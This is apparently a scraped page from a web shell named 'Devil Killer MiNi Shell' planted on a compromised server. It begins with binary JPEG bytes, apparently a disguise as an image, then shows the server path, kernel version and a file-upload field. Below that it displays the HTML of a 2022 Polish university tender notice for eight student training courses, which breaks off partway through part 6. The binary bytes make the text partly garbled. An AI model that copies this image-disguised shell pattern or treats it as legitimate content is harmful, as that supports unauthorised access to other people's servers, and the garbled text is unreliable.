JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0004056902-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Realizacja szkoleń podnoszących kompetencje analityczne i interpersonalne studentów i kadry, dydaktycznej Uniwersytetu Ekonomicznego w Krakowie - 8 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Ekonomiczny w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001519</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rakowicka 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-510</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zubelm@uek.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://przetargi.uek.krakow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja szkoleń podnoszących kompetencje analityczne i interpersonalne studentów i kadry, dydaktycznej Uniwersytetu Ekonomicznego w Krakowie - 8 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e83bd53-804c-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00040569</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016988/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Usługi szkoleniowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zintegrowany Program Rozwoju Uniwersytetu Ekonomicznego w Krakowie, Program Operacyjny Wiedza Edukacja Rozwój na lata 2014 – 2020, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Oś priorytetowa III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5. Kompleksowe programy szkół wyższych, na podstawie umowy o numerze POWR.03.05.00-00-Z217/18. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://uek-krakow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez system zapewniający obsługę procesu udzielania zamówień publicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej Systemem. System jest dostępny pod adresem: https://uek-krakow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe wymagania techniczne i organizacyjne oraz zasady dotyczące korespondencji określa Rozdział 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe określenie zasad związanych z obowiązkiem informacyjnym RODO zawarto w Rozdziale 23 SWZ - &#34;Informacja o przetwarzaniu danych osobowych&#34;.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe określenie zasad związanych z ograniczeniem stosowania RODO zawarto w Rozdziale 23 SWZ - &#34;Informacja o przetwarzaniu danych osobowych&#34;.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ.201.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 2544715,59 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 329567,50 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla studentów UEK pn.: &#34;Komunikacja interpersonalna&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 1 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 30500,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla studentów UEK pn.: &#34;Negocjacje handlowe&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – Część 2 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41759,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla studentów UEK pn.: &#34;Efektywna praca pod presją czasu&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 3 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 68018,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla studentów UEK pn.: &#34;Trening analitycznego myślenia i rozwiązywania problemów&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 4 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 48762,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla studentów UEK pn.: &#34;Design thinking w praktyce biznesowej&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 5 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 49262,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla studentów UEK pn.: &#34;Kompetencje społeczne w biznesie&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 6 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 48762,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi 